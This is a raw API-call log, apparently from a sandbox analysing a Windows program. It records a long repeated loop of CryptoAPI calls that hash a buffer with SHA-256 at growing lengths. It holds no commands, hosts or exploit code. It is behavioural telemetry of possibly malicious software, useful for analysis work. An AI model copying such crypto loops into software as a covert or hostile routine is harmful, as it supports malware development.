	[0118.460] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a96c8
	[0118.460] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a96c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a96c8, pdwDataLen=0x129364) returned 1
	[0118.460] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.460] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.460] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.460] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.460] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0118.460] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a96f0
	[0118.460] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a96f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a96f0, pdwDataLen=0x129364) returned 1
	[0118.460] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.460] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.460] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.461] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.461] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0118.461] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9718
	[0118.461] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9718, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9718, pdwDataLen=0x129364) returned 1
	[0118.461] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.461] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.461] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.461] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.461] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0118.461] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9740
	[0118.461] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9740, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9740, pdwDataLen=0x129364) returned 1
	[0118.461] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.461] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.461] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.462] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.462] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0118.462] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9768
	[0118.462] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9768, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9768, pdwDataLen=0x129364) returned 1
	[0118.462] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.462] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.462] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.462] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.462] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0118.462] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9790
	[0118.462] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9790, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9790, pdwDataLen=0x129364) returned 1
	[0118.462] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.462] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.462] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.463] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.463] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0118.463] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a97b8
	[0118.463] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a97b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a97b8, pdwDataLen=0x129364) returned 1
	[0118.463] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.463] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.463] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.463] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.463] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0118.463] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a97e0
	[0118.463] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a97e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a97e0, pdwDataLen=0x129364) returned 1
	[0118.463] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.463] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.463] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.464] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.464] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0118.464] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9808
	[0118.464] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9808, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9808, pdwDataLen=0x129364) returned 1
	[0118.464] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.464] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.464] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.464] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.464] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0118.464] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9830
	[0118.464] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9830, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9830, pdwDataLen=0x129364) returned 1
	[0118.464] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.464] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.464] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.465] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.465] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0118.465] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9858
	[0118.465] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9858, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9858, pdwDataLen=0x129364) returned 1
	[0118.465] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.465] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.465] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.465] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.465] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0118.465] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9880
	[0118.465] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9880, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9880, pdwDataLen=0x129364) returned 1
	[0118.465] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.465] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.465] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.466] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.466] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0118.466] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a98a8
	[0118.466] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a98a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a98a8, pdwDataLen=0x129364) returned 1
	[0118.466] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.466] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.466] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.466] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.466] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0118.466] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a98d0
	[0118.466] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a98d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a98d0, pdwDataLen=0x129364) returned 1
	[0118.466] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.466] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.466] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.467] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.467] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0118.467] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a98f8
	[0118.467] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a98f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a98f8, pdwDataLen=0x129364) returned 1
	[0118.467] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.467] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.467] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.467] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.467] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0118.467] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9920
	[0118.467] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9920, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9920, pdwDataLen=0x129364) returned 1
	[0118.468] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.468] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.468] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.468] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.468] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0118.468] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9948
	[0118.468] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9948, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9948, pdwDataLen=0x129364) returned 1
	[0118.468] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.468] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.468] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.468] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.468] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0118.468] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9970
	[0118.468] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9970, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9970, pdwDataLen=0x129364) returned 1
	[0118.469] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.469] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.469] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.469] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.469] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0118.469] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9998
	[0118.469] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9998, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9998, pdwDataLen=0x129364) returned 1
	[0118.469] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.469] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.469] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.469] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.469] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0118.469] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a99c0
	[0118.470] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a99c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a99c0, pdwDataLen=0x129364) returned 1
	[0118.470] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.470] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.470] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.470] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.470] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0118.470] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a99e8
	[0118.470] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a99e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a99e8, pdwDataLen=0x129364) returned 1
	[0118.470] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.470] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.470] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.470] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.470] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0118.470] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9a10
	[0118.471] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9a10, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9a10, pdwDataLen=0x129364) returned 1
	[0118.471] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.471] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.471] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.471] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.471] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0118.471] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9a38
	[0118.471] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9a38, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9a38, pdwDataLen=0x129364) returned 1
	[0118.471] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.471] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.471] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.471] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.471] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0118.471] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9a60
	[0118.472] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9a60, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9a60, pdwDataLen=0x129364) returned 1
	[0118.472] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.472] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.472] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.472] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.472] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0118.472] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9a88
	[0118.472] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9a88, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9a88, pdwDataLen=0x129364) returned 1
	[0118.472] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.472] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.472] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.472] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.472] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0118.472] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.473] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9ab0
	[0118.473] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9ab0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9ab0, pdwDataLen=0x129364) returned 1
	[0118.473] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.473] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.473] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.473] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
